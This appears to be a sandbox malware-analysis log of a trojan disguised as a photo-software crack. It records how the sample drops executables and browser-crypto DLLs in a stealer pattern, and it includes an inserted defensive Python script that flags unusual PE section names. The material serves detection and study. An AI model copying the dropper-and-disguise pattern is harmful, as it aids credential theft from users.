                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_004313C8
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_00445658
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_004357B8
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_0045F954
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_00445A64
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_0045BA04
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_00489FEC
                      Source: C:\Users\user\Desktop\KbqArOlW06.exe | Process Stats: CPU usage > 98%
                      Source: 2.0.0-beta2.cps.exe.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 2.0.0-beta2.cps.exe.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp.21.dr | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                      Source: sqlite3.dll.16.dr | Static PE information: Number of sections : 18 > 10
                      Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe | Code function: 21_2_00409920 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_00455E14 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: String function: 00453B40 appears 97 times
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: String function: 0040909C appears 45 times
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: String function: 0040596C appears 114 times
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: String function: 004587AC appears 84 times
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: String function: 00403400 appears 62 times
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: String function: 004585A0 appears 124 times
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: String function: 00406F54 appears 45 times
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: String function: 00403494 appears 84 times
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: String function: 00446594 appears 58 times
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: String function: 0040357C appears 34 times
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: String function: 004462C4 appears 45 times
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: String function: 004349CC appears 32 times
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: String function: 00403684 appears 233 times
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: String function: 00407D84 appears 43 times
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_00424014 NtdllDefWindowProc_A,
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_00412A68 NtdllDefWindowProc_A,
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_0047AC34 NtdllDefWindowProc_A,
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_0042FA00 NtdllDefWindowProc_A,
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_00457E24 PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_0042EDC4: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError,
                      Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp.21.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                      Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp.21.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                      Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp.21.dr | Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                      Source: KbqArOlW06.exe | Static PE information: No import functions for PE file found
                      Source: KbqArOlW06.exe, 00000000.00000002.469170712.0000000001122000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameA1Photo-&-Art-Enhancer_Search&Patch_Activation.exe vs KbqArOlW06.exe
                      Source: KbqArOlW06.exe, 00000000.00000002.472580658.0000000001B9B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs KbqArOlW06.exe
                      Source: KbqArOlW06.exe | Binary or memory string: OriginalFilenameA1Photo-&-Art-Enhancer_Search&Patch_Activation.exe vs KbqArOlW06.exe
                      Source: KbqArOlW06.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\KbqArOlW06.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\KbqArOlW06.exe.log
                      Source: classification engine | Classification label: mal60.troj.spyw.evad.winEXE@7/13@0/1
                      Source: C:\Users\user\Desktop\KbqArOlW06.exe | File read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe | Code function: 21_2_0040A10C FindResourceA,SizeofResource,LoadResource,LockResource,
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
                      Source: KbqArOlW06.exe | Virustotal: Detection: 26%
                      Source: KbqArOlW06.exe | Metadefender: Detection: 28%
                      Source: KbqArOlW06.exe | ReversingLabs: Detection: 69%
                      Source: C:\Users\user\Desktop\KbqArOlW06.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknown | Process created: C:\Users\user\Desktop\KbqArOlW06.exe "C:\Users\user\Desktop\KbqArOlW06.exe"
                      Source: C:\Users\user\Desktop\KbqArOlW06.exe | Process created: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe "C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe"
                      Source: C:\Users\user\Desktop\KbqArOlW06.exe | Process created: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe "C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe"
                      Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe | Process created: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp "C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp" /SL5="$303B2,111616,111616,C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe"
                      Source: C:\Users\user\Desktop\KbqArOlW06.exe | Process created: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe "C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe"
                      Source: C:\Users\user\Desktop\KbqArOlW06.exe | Process created: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe "C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe"
                      Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe | Process created: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp "C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp" /SL5="$303B2,111616,111616,C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe"
                      Source: C:\Users\user\Desktop\KbqArOlW06.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
                      Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe | Code function: 21_2_00409920 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_00455E14 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,
                      Source: C:\Users\user\Desktop\KbqArOlW06.exe | File created: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_0045663C GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,
                      Source: 2.0.0-beta2.cps.exe, 00000010.00000002.510199910.0000000061EB5000.00000002.00000001.01000000.0000000E.sdmp, 2.0.0-beta2.cps.exe, 00000010.00000002.512735384.000000006D9EF000.00000002.00000001.01000000.00000010.sdmp | Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                      Source: 2.0.0-beta2.cps.exe, 00000010.00000002.510199910.0000000061EB5000.00000002.00000001.01000000.0000000E.sdmp, 2.0.0-beta2.cps.exe, 00000010.00000002.512735384.000000006D9EF000.00000002.00000001.01000000.00000010.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                      Source: 2.0.0-beta2.cps.exe, 00000010.00000002.510199910.0000000061EB5000.00000002.00000001.01000000.0000000E.sdmp, 2.0.0-beta2.cps.exe, 00000010.00000002.512735384.000000006D9EF000.00000002.00000001.01000000.00000010.sdmp | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                      Source: 2.0.0-beta2.cps.exe, 00000010.00000002.510199910.0000000061EB5000.00000002.00000001.01000000.0000000E.sdmp, 2.0.0-beta2.cps.exe, 00000010.00000002.512735384.000000006D9EF000.00000002.00000001.01000000.00000010.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                      Source: 2.0.0-beta2.cps.exe, 00000010.00000002.510199910.0000000061EB5000.00000002.00000001.01000000.0000000E.sdmp, 2.0.0-beta2.cps.exe, 00000010.00000002.512735384.000000006D9EF000.00000002.00000001.01000000.00000010.sdmp | Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                      Source: 2.0.0-beta2.cps.exe, 00000010.00000002.510199910.0000000061EB5000.00000002.00000001.01000000.0000000E.sdmp | Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
                      Source: 2.0.0-beta2.cps.exe, 00000010.00000002.510199910.0000000061EB5000.00000002.00000001.01000000.0000000E.sdmp, 2.0.0-beta2.cps.exe, 00000010.00000002.512735384.000000006D9EF000.00000002.00000001.01000000.00000010.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                      Source: 2.0.0-beta2.cps.exe, 00000010.00000002.510199910.0000000061EB5000.00000002.00000001.01000000.0000000E.sdmp | Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                      Source: 2.0.0-beta2.cps.exe, 00000010.00000002.510199910.0000000061EB5000.00000002.00000001.01000000.0000000E.sdmp | Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                      Source: KbqArOlW06.exe | Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
                      Source: C:\Users\user\Desktop\KbqArOlW06.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe | Mutant created: \Sessions\1\BaseNamedObjects\CCOYS///hdr
                      Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe | String found in binary or memory: need to be updated. /RESTARTAPPLICATIONS Instructs Setup to restart applications. /NORESTARTAPPLICATIONS Prevents Setup from restarting applications. /LOADINF="filename" Instructs Setup to load the settings from the specified file after having checked t
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpWindow found: window name: TSelectLanguageForm
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpAutomated click: OK
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpAutomated click: Next >
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpAutomated click: I accept the agreement
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpAutomated click: Next >
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpAutomated click: I accept the agreement
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpAutomated click: Next >
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpAutomated click: OK
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: KbqArOlW06.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                      Source: KbqArOlW06.exeStatic PE information: Image base 0x140000000 > 0x60000000
                      Source: KbqArOlW06.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: KbqArOlW06.exeStatic file information: File size 12978176 > 1048576
                      Source: KbqArOlW06.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0xc51c00
                      Source: KbqArOlW06.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: freebl3.pdb source: freebl3.dll.16.dr
                      Source: Binary string: mozglue.pdb@+ source: 2.0.0-beta2.cps.exe, 00000010.00000002.511072689.000000006D833000.00000002.00000001.01000000.0000000F.sdmp, mozglue.dll.16.dr
                      Source: Binary string: nss3.pdb source: 2.0.0-beta2.cps.exe, 00000010.00000002.512735384.000000006D9EF000.00000002.00000001.01000000.00000010.sdmp
                      Source: Binary string: mozglue.pdb source: 2.0.0-beta2.cps.exe, 00000010.00000002.511072689.000000006D833000.00000002.00000001.01000000.0000000F.sdmp, mozglue.dll.16.dr
                      Source: Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.16.dr
                      Source: Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.16.dr

                      Data Obfuscation

                       Source: KbqArOlW06.exe, ???????????????????.cs | .Net Code: Main System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                       Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe | Process created: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp "C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp" /SL5="$303B2,111616,111616,C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe" (2 identical entries)
                       Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe | Code function: 21_2_00406A50 push 00406A8Dh; ret
                       Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe | Code function: 21_2_004040B5 push eax; ret
                       Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe | Code function: 21_2_00404185 push 00404391h; ret
                       Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe | Code function: 21_2_00404206 push 00404391h; ret
                       Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe | Code function: 21_2_004042E8 push 00404391h; ret
                       Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe | Code function: 21_2_00404283 push 00404391h; ret
                       Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe | Code function: 21_2_004093EC push 0040941Fh; ret
                       Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe | Code function: 21_2_004085B8 push ecx; mov dword ptr [esp], eax
                       Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_00409DDC push 00409E19h; ret
                       Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_0041A0B8 push ecx; mov dword ptr [esp], ecx
                       Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_00452194 push ecx; mov dword ptr [esp], eax
                       Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_004062CC push ecx; mov dword ptr [esp], eax
                       Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_0040A2DF push ds; ret
                       Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_004605AC push ecx; mov dword ptr [esp], ecx
                       Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_00458848 push 00458880h; ret
                       Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_00410970 push ecx; mov dword ptr [esp], edx
                       Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_00412DB8 push 00412E1Bh; ret
                       Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_0040D2C8 push ecx; mov dword ptr [esp], edx
                       Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_0040546D push eax; ret
                       Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_0040553D push 00405749h; ret
                       Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_004055BE push 00405749h; ret
                       Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_0040563B push 00405749h; ret
                       Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_004056A0 push 00405749h; ret
                       Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_0040F828 push ecx; mov dword ptr [esp], edx
                       Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_00443930 push ecx; mov dword ptr [esp], ecx
                       Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_00487AF0 push ecx; mov dword ptr [esp], ecx
                       Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_00459B60 push 00459BA4h; ret
                       Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_00497B18 push ecx; mov dword ptr [esp], ecx
                       Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_00479C7C push ecx; mov dword ptr [esp], edx
                       Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_00451FD0 push 00452003h; ret
                       Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_00450A28 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                       Source: 2.0.0-beta2.cps.exe.0.dr | Static PE information: section name: .2vB
                       Source: 2.0.0-beta2.cps.exe.0.dr | Static PE information: section name: .a|D
                       Source: 2.0.0-beta2.cps.exe.0.dr | Static PE information: section name: .=xC
                       Source: nss3.dll.16.dr | Static PE information: section name: .00cfg
                       Source: msvcp140.dll.16.dr | Static PE information: section name: .didat
                       Source: mozglue.dll.16.dr | Static PE information: section name: .00cfg
                       Source: freebl3.dll.16.dr | Static PE information: section name: .00cfg
                       Source: softokn3.dll.16.dr | Static PE information: section name: .00cfg
                       Source: sqlite3.dll.16.dr | Static PE information: section name: /4
                       Source: sqlite3.dll.16.dr | Static PE information: section name: /19
                       Source: sqlite3.dll.16.dr | Static PE information: section name: /31
                       Source: sqlite3.dll.16.dr | Static PE information: section name: /45
                       Source: sqlite3.dll.16.dr | Static PE information: section name: /57
                       Source: sqlite3.dll.16.dr | Static PE information: section name: /70
                       Source: sqlite3.dll.16.dr | Static PE information: section name: /81
                       Source: sqlite3.dll.16.dr | Static PE information: section name: /92
                       Source: initial sample | Static PE information: section where entry point is pointing to: .=xC
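Of the section names listed above, .00cfg (MSVC control-flow-guard data) and .didat (delay-import data) are standard MSVC linker output, and names of the form /4, /19, ... are the COFF long-name convention (a decimal offset into the string table) that GNU binutils uses for sections whose names exceed eight bytes, which is why they appear in the GCC-built sqlite3.dll. Only the three packer-style names .2vB, .a|D and .=xC in 2.0.0-beta2.cps.exe, the last of which holds the entry point, are genuinely unusual. The script below is an added example and is not code from the report or from the sample: it reads section names from a PE header, resolves /NN names through the string table, and classifies the result. The whitelist and the name pattern are heuristic assumptions, and the PE it parses is a constructed header built in the script, not the sample.

```python
"""Read PE section names, resolve '/NN' long names through the COFF string
table, and flag names outside common toolchain output.  Added example, not
the report's or the sample's code; the PE it parses is constructed below."""
import re
import struct

# Odd-looking but legitimate linker sections (assumption: illustrative list).
KNOWN_ODD = {".00cfg", ".didat", ".gfids", ".giats", ".voltbl", ".retplne"}
# Conventional names: a dot, then an identifier (assumption: heuristic only).
NORMAL_RE = re.compile(r"^\.[A-Za-z_][A-Za-z0-9_]*$")


def section_names(pe):
    """Return [(raw_name, resolved_name)] for every section in the PE image bytes."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    coff = e_lfanew + 4
    _machine, nsect, _ts, sym_off, nsyms, opt_size, _chars = struct.unpack_from("<HHIIIHH", pe, coff)
    strtab = sym_off + nsyms * 18 if sym_off else None  # string table follows the symbol table
    table = coff + 20 + opt_size                         # section headers follow the optional header
    names = []
    for i in range(nsect):
        raw = pe[table + i * 40: table + i * 40 + 8].rstrip(b"\0").decode("latin-1")
        name = raw
        if raw.startswith("/") and raw[1:].isdigit() and strtab is not None:
            off = strtab + int(raw[1:])                  # decimal offset into the string table
            name = pe[off:pe.index(b"\0", off)].decode("latin-1")
        names.append((raw, name))
    return names


def classify(name):
    """'ok' for conventional or known names, else 'non-printable' or 'suspicious'."""
    if name in KNOWN_ODD or NORMAL_RE.match(name):
        return "ok"
    if any(c < " " or c > "~" for c in name):
        return "non-printable"
    return "suspicious"


def audit(pe):
    """(raw_name, resolved_name, verdict) for every section of the image."""
    return [(raw, name, classify(name)) for raw, name in section_names(pe)]


def build_pe(raw_names, long_names):
    """Construct a minimal PE header (no optional header, no code) whose string
    table holds `long_names`, so that '/4', '/16', ... resolve to them."""
    body = b"".join(n.encode() + b"\0" for n in long_names)
    strtab = struct.pack("<I", 4 + len(body)) + body      # size field counts itself
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)      # e_lfanew = 64
    headers = b"".join(n.encode("latin-1").ljust(8, b"\0") + b"\0" * 32 for n in raw_names)
    sym_off = 64 + 4 + 20 + len(headers)                  # empty symbol table; string table right after
    coff = struct.pack("<HHIIIHH", 0x14C, len(raw_names), 0, sym_off, 0, 0, 0x102)
    return dos + b"PE\0\0" + coff + headers + strtab


# Constructed sample: the names the report lists, plus two GNU-style long names.
SAMPLE_PE = build_pe([".text", ".=xC", ".a|D", ".2vB", "/4", "/16", ".00cfg"],
                     [".debug_info", ".eh_frame"])

if __name__ == "__main__":
    for raw, name, verdict in audit(SAMPLE_PE):
        print("%-8s -> %-12s %s" % (raw, name, verdict))
```

Run against a real file with `audit(open(path, "rb").read())`; a /NN name that cannot be resolved (no symbol table pointer) is reported verbatim, which is itself a sign that a binary was stripped after linking.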
                       Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe | File created: C:\Users\user\AppData\LocalLow\msvcp140.dll
                       Source: C:\Users\user\Desktop\KbqArOlW06.exe | File created: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe
                       Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe | File created: C:\Users\user\AppData\LocalLow\softokn3.dll
